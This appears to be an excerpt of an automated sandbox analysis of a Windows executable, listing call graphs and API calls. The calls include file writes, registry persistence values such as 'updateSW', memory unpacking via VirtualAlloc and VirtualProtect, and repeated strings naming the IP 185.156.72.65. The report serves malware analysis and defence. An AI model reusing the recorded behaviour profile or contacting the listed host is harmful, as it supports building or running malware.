402390 39 API calls 28479->28491 28854 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28480->28854 28484 4066c8 28481->28484 28485 40664a 28482->28485 28821 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28483->28821 28499 402390 39 API calls 28484->28499 28830 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28485->28830 28495 4064aa 28489->28495 28490 406568 28496 402390 39 API calls 28490->28496 28497 4063f5 28491->28497 28492 406875 28493 402390 39 API calls 28492->28493 28498 4066a7 28493->28498 28494 406653 28500 402390 39 API calls 28494->28500 28501 4064b8 28495->28501 28502 4064ae 28495->28502 28503 406570 28496->28503 28497->28498 28807 407210 53 API calls 2 library calls 28497->28807 28755 4017a0 28498->28755 28504 4066dc 28499->28504 28505 40665b 28500->28505 28815 407520 53 API calls 2 library calls 28501->28815 28814 4074a0 53 API calls 2 library calls 28502->28814 28822 4077b0 53 API calls 2 library calls 28503->28822 28511 4066e0 28504->28511 28512 40675e 28504->28512 28831 407b60 53 API calls 2 library calls 28505->28831 28836 407d00 53 API calls 2 library calls 28511->28836 28842 407e80 53 API calls 2 library calls 28512->28842 28514 406575 28525 402460 43 API calls 28514->28525 28515 4064bd 28523 402460 43 API calls 28515->28523 28516 4068a1 28759 4083f0 28516->28759 28519 406660 28527 402460 43 API calls 28519->28527 28521 406763 28530 402460 43 API calls 28521->28530 28522 4066e5 28531 402460 43 API calls 28522->28531 28526 4064cd 28523->28526 28524 4068aa 28534 402460 43 API calls 28524->28534 28528 406585 28525->28528 28539 402390 39 API calls 28526->28539 28532 406670 28527->28532 28823 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28528->28823 28535 406773 28530->28535 28536 4066f5 28531->28536 28832 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28532->28832 28533 40658e 28538 402390 39 API calls 28533->28538 28540 4068bd 28534->28540 28551 402390 39 API calls 28535->28551 28837 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28536->28837 28543 406596 28538->28543 28544 4064e1 28539->28544 28769 408370 28540->28769 28542 406679 28547 402390 39 API calls 28542->28547 28824 407830 53 API calls 2 library calls 28543->28824 28544->28498 28816 4075b0 53 API calls 2 library calls 28544->28816 28546 4066fe 28552 402390 39 API calls 28546->28552 28548 406681 28547->28548 28833 407bf0 53 API calls 2 library calls 28548->28833 28550 4068c8 28566 402460 43 API calls 28550->28566 28557 406787 28551->28557 28553 406706 28552->28553 28838 407d80 53 API calls 2 library calls 28553->28838 28555 40659b 28569 402460 43 API calls 28555->28569 28558 40678b 28557->28558 28559 4067de 28557->28559 28843 407f10 53 API calls 2 library calls 28558->28843 28848 4080d0 53 API calls 2 library calls 28559->28848 28561 406686 28572 402460 43 API calls 28561->28572 28817 407630 53 API calls 2 library calls 28562->28817 28564 40670b 28575 402460 43 API calls 28564->28575 28567 4068db 28566->28567 28779 4082d0 28567->28779 28568 406790 28577 402460 43 API calls 28568->28577 28573 4065ab 28569->28573 28570 4067e3 28580 402460 43 API calls 28570->28580 28576 406696 28572->28576 28584 402390 39 API calls 28573->28584 28574 4068e6 28586 402460 43 API calls 28574->28586 28578 40671b 28575->28578 28834 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28576->28834 28581 4067a0 28577->28581 28839 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28578->28839 28585 4067f3 28580->28585 28844 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28581->28844 28583 40669f 28589 402390 39 API calls 28583->28589 28590 4065bf 28584->28590 28595 402390 39 API calls 28585->28595 28591 4068f9 28586->28591 28588 406724 28593 402390 39 API calls 28588->28593 28589->28498 28594 4065c8 28590->28594 28825 4078c0 53 API calls 2 library calls 28590->28825 28789 408da0 28591->28789 28592 4067a9 28598 402390 39 API calls 28592->28598 28599 40672c 28593->28599 28826 407940 53 API calls 2 library calls 28594->28826 28601 406807 28595->28601 28604 4067b1 28598->28604 28840 407e00 53 API calls 2 library calls 28599->28840 28601->28498 28849 408150 53 API calls 2 library calls 28601->28849 28602 4065d2 28613 402460 43 API calls 28602->28613 28845 407fd0 53 API calls 2 library calls 28604->28845 28608 406731 28617 402460 43 API calls 28608->28617 28610 406926 28797 408eb0 28610->28797 28611 4067b6 28620 402460 43 API calls 28611->28620 28612 406810 28623 402460 43 API calls 28612->28623 28615 4065e2 28613->28615 28628 402390 39 API calls 28615->28628 28618 406741 28617->28618 28841 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28618->28841 28619 408e00 43 API calls 28624 406953 28619->28624 28621 4067c6 28620->28621 28846 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28621->28846 28627 406820 28623->28627 28629 408eb0 43 API calls 28624->28629 28626 40674a 28632 402390 39 API calls 28626->28632 28850 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28627->28850 28634 4065f6 28628->28634 28630 406968 28629->28630 28635 408e00 43 API calls 28630->28635 28631 4067cf 28636 402390 39 API calls 28631->28636 28632->28498 28634->28498 28827 4079d0 53 API calls 2 library calls 28634->28827 28638 406980 28635->28638 28639 4067d7 28636->28639 28637 406829 28640 402390 39 API calls 28637->28640 28642 402390 39 API calls 28638->28642 28847 408050 53 API calls 2 library calls 28639->28847 28644 406831 28640->28644 28645 40698e 28642->28645 28851 4081d0 53 API calls 2 library calls 28644->28851 28647 402390 39 API calls 28645->28647 28649 406999 28647->28649 28648 406836 28652 402460 43 API calls 28648->28652 28650 402390 39 API calls 28649->28650 28653 4069a4 28650->28653 28651 4067dc 28654 402460 43 API calls 28651->28654 28655 406846 28652->28655 28656 402390 39 API calls 28653->28656 28654->28480 28852 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28655->28852 28658 4069af 28656->28658 28660 402390 39 API calls 28658->28660 28659 40684f 28661 402390 39 API calls 28659->28661 28662 4069ba 28660->28662 28663 406857 28661->28663 28664 402390 39 API calls 28662->28664 28853 408250 53 API calls 2 library calls 28663->28853 28666 4069c5 28664->28666 28667 402390 39 API calls 28666->28667 28668 4069d0 28667->28668 28669 402390 39 API calls 28668->28669 28672 4069df 28669->28672 28670 406a3e Sleep 28670->28672 28671 402460 43 API calls 28671->28672 28672->28670 28672->28671 28673 406a47 28672->28673 28674 402390 39 API calls 28673->28674 28675 406a4f 28674->28675 28855 408c80 43 API calls 2 library calls 28675->28855 28677 406a60 28856 408c80 43 API calls 2 library calls 28677->28856 28679 406a79 28857 408c80 43 API calls 2 library calls 28679->28857 28681 406a8c 28858 404f70 130 API calls 6 library calls 28681->28858 28684 402830 28683->28684 28685 40277f 28683->28685 28701 401600 43 API calls 3 library calls 28684->28701 28686 40278b __InternalCxxFrameHandler 28685->28686 28690 4027ee 28685->28690 28691 4027b3 28685->28691 28694 4027f7 28685->28694 28686->28367 28688 402835 28702 401560 41 API calls 2 library calls 28688->28702 28690->28688 28690->28691 28699 401560 41 API calls 3 library calls 28691->28699 28693 4027c6 28698 4027cf __InternalCxxFrameHandler 28693->28698 28703 40cfef 28693->28703 28694->28698 28700 401560 41 API calls 3 library calls 28694->28700 28698->28367 28699->28693 28700->28698 28701->28688 28702->28693 28708 40cf2b 39 API calls __cftof 28703->28708 28705 40cffe 28709 40d00c 11 API calls __FrameHandler3::FrameUnwindToState 28705->28709 28707 40d00b 28708->28705 28709->28707 28711 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 28710->28711 28711->28370 28859 4128e2 GetLastError 28712->28859 28726 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28715->28726 28719 403c33 28719->28378 28720 403b8d 28721 403bd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28720->28721 28722 403c37 28720->28722 28898 409a17 28721->28898 28724 40cfef 39 API calls 28722->28724 28723 403b75 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28723->28721 28723->28722 28906 408f80 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28723->28906 28725 403c3c 28724->28725 28726->28722 28726->28723 28905 408c80 43 API calls 2 library calls 28726->28905 28728 406c6c 28727->28728 28736 406c9e 28727->28736 28908 409cc5 6 API calls 28728->28908 28729 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 28731 406cb0 28729->28731 28731->28380 28732 406c76 28732->28736 28909 409fd7 42 API calls 28732->28909 28734 406c94 28910 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 28734->28910 28736->28729 28738 40239b 28737->28738 28739 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28737->28739 28738->28739 28740 40cfef 39 API calls 28738->28740 28739->28384 28741 4023da 28740->28741 28742 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 28741->28742 28743 40cfef 39 API calls 28741->28743 28742->28384 28744 40245c 28743->28744 28746 406f0e 28745->28746 28754 406f48 28745->28754 28911 409cc5 6 API calls 28746->28911 28747 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 28750 406f5b 28747->28750 28749 406f18 28749->28754 28912 409fd7 42 API calls 28749->28912 28750->28386 28752 406f3e 28913 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 28752->28913 28754->28747 28756 4017b3 __FrameHandler3::FrameUnwindToState 28755->28756 28914 409b8a 28756->28914 28758 4017ca __FrameHandler3::FrameUnwindToState 28758->28516 28760 40845e 28759->28760 28761 408422 28759->28761 28762 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 28760->28762 28941 409cc5 6 API calls 28761->28941 28764 408470 28762->28764 28764->28524 28765 40842c 28765->28760 28942 409fd7 42 API calls 28765->28942 28767 408454 28943 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 28767->28943 28770 40839c 28769->28770 28778 4083ce 28769->28778 28944 409cc5 6 API calls 28770->28944 28772 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 28774 4083e0 28772->28774 28773 4083a6 28773->28778 28945 409fd7 42 API calls 28773->28945 28774->28550 28776 4083c4 28946 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 28776->28946 28778->28772 28780 40830d 28779->28780 28788 408352 28779->28788 28947 409cc5 6 API calls 28780->28947 28782 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 28783 408365 28782->28783 28783->28574 28784 408317 28784->28788 28948 409fd7 42 API calls 28784->28948 28786 408348 28949 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 28786->28949 28788->28782 28790 408db4 28789->28790 28950 409310 28790->28950 28792 40690e 28793 408e00 28792->28793 28794 408e1b 28793->28794 28795 408e2f __InternalCxxFrameHandler 28794->28795 28956 402840 43 API calls 3 library calls 28794->28956 28795->28610 28957 409130 28797->28957 28799 40693b 28799->28619 28800->28396 28801->28402 28802->28408 28803->28421 28804->28430 28805->28465 28806->28464 28807->28465 28808->28395 28809->28411 28810->28422 28811->28434 28812->28448 28813->28468 28814->28465 28815->28515 28816->28562 28817->28412 28818->28437 28819->28452 28820->28469 28821->28490 28822->28514 28823->28533 28824->28555 28825->28594 28826->28602 28827->28432 28828->28436 28829->28473 28830->28494 28831->28519 28832->28542 28833->28561 28834->28583 28835->28472 28836->28522 28837->28546 28838->28564 28839->28588 28840->28608 28841->28626 28842->28521 28843->28568 28844->28592 28845->28611 28846->28631 28847->28651 28848->28570 28849->28612 28850->28637 28851->28648 28852->28659 28853->28651 28854->28492 28855->28677 28856->28679 28857->28681 28860 4128f8 28859->28860 28865 4128fe 28859->28865 28888 4135a6 6 API calls __dosmaperr 28860->28888 28863 41291a 28864 412902 28863->28864 28866 412922 28863->28866 28867 412987 SetLastError 28864->28867 28865->28864 28889 4135e5 6 API calls __dosmaperr 28865->28889 28890 413294 14 API calls __dosmaperr 28866->28890 28870 405aa8 Sleep 28867->28870 28871 412997 28867->28871 28869 41292f 28873 412937 28869->28873 28874 412948 28869->28874 28870->28373 28897 411109 39 API calls __FrameHandler3::FrameUnwindToState 28871->28897 28891 4135e5 6 API calls __dosmaperr 28873->28891 28892 4135e5 6 API calls __dosmaperr 28874->28892 28878 412954 28880 412958 28878->28880 28881 41296f 28878->28881 28879 412945 28894 4132f1 14 API calls __dosmaperr 28879->28894 28893 4135e5 6 API calls __dosmaperr 28880->28893 28895 412710 14 API calls __dosmaperr 28881->28895 28885 41296c 28885->28867 28886 41297a 28896 4132f1 14 API calls __dosmaperr 28886->28896 28888->28865 28889->28863 28890->28869 28891->28879 28892->28878 28893->28879 28894->28885 28895->28886 28896->28885 28899 409a20 IsProcessorFeaturePresent 28898->28899 28900 409a1f 28898->28900 28902 409a67 28899->28902 28900->28719 28907 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28902->28907 28904 409b4a 28904->28719 28905->28726 28906->28720 28907->28904 28908->28732 28909->28734 28910->28736 28911->28749 28912->28752 28913->28754 28916 409b4c 28914->28916 28917 409b6b 28916->28917 28919 409b6d 28916->28919 28928 40fb4d 28916->28928 28937 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 28916->28937 28917->28758 28920 401560 Concurrency::cancel_current_task 28919->28920 28922 409b77 28919->28922 28935 40af80 RaiseException 28920->28935 28938 40af80 RaiseException 28922->28938 28923 40157c 28936 40ad31 40 API calls ___std_exception_copy 28923->28936 28926 40a589 28927 4015a3 28927->28758 28933 413cb9 __dosmaperr 28928->28933 28929 413cf7 28940 40d0dd 14 API calls __dosmaperr 28929->28940 28930 413ce2 RtlAllocateHeap 28932 413cf5 28930->28932 28930->28933 28932->28916 28933->28929 28933->28930 28939 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 28933->28939 28935->28923 28936->28927 28937->28916 28938->28926 28939->28933 28940->28932 28941->28765 28942->28767 28943->28760 28944->28773 28945->28776 28946->28778 28947->28784 28948->28786 28949->28788 28951 409398 28950->28951 28954 40932a __InternalCxxFrameHandler 28950->28954 28955 4095d0 43 API calls 4 library calls 28951->28955 28953 4093aa 28953->28792 28954->28792 28955->28953 28956->28795 28958 409173 28957->28958 28959 4092fd 28958->28959 28960 40923d 28958->28960 28966 409178 __InternalCxxFrameHandler 28958->28966 28976 401600 43 API calls 3 library calls 28959->28976 28964 409272 28960->28964 28965 409298 28960->28965 28962 409302 28977 401560 41 API calls 2 library calls 28962->28977 28964->28962 28968 40927d 28964->28968 28973 40928a __InternalCxxFrameHandler 28965->28973 28975 401560 41 API calls 3 library calls 28965->28975 28966->28799 28967 409283 28970 40cfef 39 API calls 28967->28970 28967->28973 28974 401560 41 API calls 3 library calls 28968->28974 28972 40930c 28970->28972 28973->28799 28974->28967 28975->28973 28976->28962 28977->28967 28978 6faf2c 28979 6faf38 VirtualProtect 28978->28979 28980 6faf4e 28979->28980 28981 5fde9b 28985 5fb42d 28981->28985 28982 5fdece RegOpenKeyA 28983 5fdef5 RegOpenKeyA 28982->28983 28982->28985 28983->28985 28984 5fdf56 GetNativeSystemInfo 28984->28985 28985->28982 28985->28983 28985->28984 28986 5fdfab 28985->28986 28987 5fd648 28988 5fda53 LoadLibraryA 28987->28988 28990 494003c 28991 4940049 28990->28991 28992 494004c 28990->28992 29006 4940e0f SetErrorMode SetErrorMode 28992->29006 28997 4940265 28998 49402ce VirtualProtect 28997->28998 29000 494030b 28998->29000 28999 4940439 VirtualFree 29004 49405f4 LoadLibraryA 28999->29004 29005 49404be 28999->29005 29000->28999 29001 49404e3 LoadLibraryA 29001->29005 29003 49408c7 29004->29003 29005->29001 29005->29004 29007 4940223 29006->29007 29008 4940d90 29007->29008 29009 4940dad 29008->29009 29010 4940dbb GetPEB 29009->29010 29011 4940238 VirtualAlloc 29009->29011 29010->29011 29011->28997

                      Executed Functions

                      Function 00403D40 Relevance: 57.8, APIs: 25, Strings: 7, Instructions: 1839sleepcomCOMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,BBD3FB9F,75920F00,00000000), ref: 00403DAA
                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                      • Sleep.KERNEL32(000003E8), ref: 00403F42
                      • __Init_thread_footer.LIBCMT ref: 00404517
                      • __Init_thread_footer.LIBCMT ref: 004046DD
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                      • __Init_thread_footer.LIBCMT ref: 00404975
                      • __Init_thread_footer.LIBCMT ref: 00404BDE
                      • CoInitialize.OLE32(00000000), ref: 00404C5F
                      • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,BBD3FB9F), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                      • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                      • __Init_thread_footer.LIBCMT ref: 00404046
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                        • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                        • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                      • __Init_thread_footer.LIBCMT ref: 00404222
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                      • API String ID: 995133137-3578497191
                      • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                      • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59
                      Function 00404F70 Relevance: 45.4, APIs: 16, Strings: 9, Instructions: 1645sleepregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 513 40512d-405150 510->513 514 4050ee-405128 510->514 511->510 518 4050b3-4050e2 call 409fd7 call 409c7b 511->518 516 405153-405158 513->516 514->513 516->516 517 40515a-4051fc call 402760 call 409310 516->517 527 405211-40522c call 401e50 517->527 528 4051fe-405207 call 409a25 517->528 518->510 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 535 4052b6-4052b8 533->535 536 405287-405296 533->536 537 405253-40525a call 409b7c 534->537 538 40523f-40524d 534->538 541 4052f0-4052fb Sleep 535->541 542 4052ba-4052cd 535->542 539 405298-4052a6 536->539 540 4052ac-4052b3 call 409b7c 536->540 537->533 538->537 543 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 538->543 539->540 539->543 540->535 541->509 546 4052d0-4052d5 542->546 554 4059b0-4059c8 543->554 555 405984-405990 543->555 546->546 551 4052d7-4052e9 call 4024a0 546->551 551->541 561 4052eb-4052ee 551->561 557 4059f2-405a0a 554->557 558 4059ca-4059d6 554->558 559 405992-4059a0 555->559 560 4059a6-4059ad call 409b7c 555->560 564 405a34-405a41 call 409a17 557->564 565 405a0c-405a18 557->565 562 4059e8-4059ef call 409b7c 558->562 563 4059d8-4059e6 558->563 559->560 566 405a42-405a47 call 40cfef 559->566 560->554 561->541 567 405300-405389 call 40b570 call 409b8a call 40b570 561->567 562->557 563->562 563->566 572 405a2a-405a31 call 409b7c 565->572 573 405a1a-405a28 565->573 586 405390-4053a2 567->586 572->564 573->566 573->572 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 589 4053fc-4053fe 587->589 590 40540d-405430 587->590 588->587 596 4053ba-4053f0 call 409fd7 call 409c7b 588->596 592 405400-40540b 589->592 593 405433-405438 590->593 592->590 592->592 593->593 595 40543a-4054dc call 402760 call 409310 593->595 605 4054f1-40550c call 401e50 595->605 606 4054de-4054e7 call 409a25 595->606 596->587 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 615 405596-405598 611->615 616 405567-405576 611->616 613 405533-40553a call 409b7c 612->613 614 40551f-40552d 612->614 613->611 614->543 614->613 620 405693-40569c 615->620 621 40559e-4055a5 615->621 618 405578-405586 616->618 619 40558c-405593 call 409b7c 616->619 618->543 618->619 619->615 620->586 624 4056a2 620->624 621->620 625 4055ab-4055b3 621->625 627 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 624->627 628 4055b9-4055bc 625->628 629 40568d 625->629 657 405807-40580d 627->657 658 4057db-4057e7 627->658 628->629 631 4055c2-4055ea call 40fb4d 628->631 629->620 636 4055f0-405602 call 40aff0 631->636 637 4055ec-4055ee 631->637 640 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 636->640 637->640 640->629 664 40565e-405669 call 403430 640->664 662 40583b-405853 657->662 663 40580f-40581b 657->663 660 4057e9-4057f7 658->660 661 4057fd-405804 call 409b7c 658->661 660->543 660->661 661->657 666 405855-405861 662->666 667 40587d-405895 662->667 669 405831-405838 call 409b7c 663->669 670 40581d-40582b 663->670 664->629 679 40566b-405679 call 403430 664->679 673 405873-40587a call 409b7c 666->673 674 405863-405871 666->674 675 405897-4058a3 667->675 676 4058bf-4058dc call 409a17 667->676 669->662 670->543 670->669 673->667 674->543 674->673 682 4058b5-4058bc call 409b7c 675->682 683 4058a5-4058b3 675->683 676->543 679->629 690 40567b-40568b call 403430 679->690 682->676 683->543 683->682 690->629 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 703 405725-40572b 700->703 701->702 704 40573b-405762 Sleep 701->704 702->704 705 405736-405739 702->705 703->702 704->694 706 405768 704->706 705->704 707 40576a-40576f Sleep 705->707 706->627 707->627
                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,BBD3FB9F), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • Sleep.KERNEL32(000007D0), ref: 00405755
                      • Sleep.KERNEL32(000007D0), ref: 0040576F
                      • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                      • API String ID: 606935701-1501174972
                      • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                      • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99
                      Function 04798464 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1397 4798464-479847d 1398 479847f-4798481 1397->1398 1399 4798488-4798494 CreateToolhelp32Snapshot 1398->1399 1400 4798483 1398->1400 1401 47984a4-47984b1 Module32First 1399->1401 1402 4798496-479849c 1399->1402 1400->1399 1403 47984ba-47984c2 1401->1403 1404 47984b3-47984b4 call 4798123 1401->1404 1402->1401 1407 479849e-47984a2 1402->1407 1408 47984b9 1404->1408 1407->1398 1407->1401 1408->1403
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0479848C
                      • Module32First.KERNEL32(00000000,00000224), ref: 047984AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: e2566512e86f89ba90c22dec4e3e596ea5bd6550231dc70b7a4f7e6d16353d7c
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 25F06236110711ABEB203FF5AC8CA6E76E8AF4A625F110528E642952D0DB74FC4546A2
                      Function 004087E0 Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
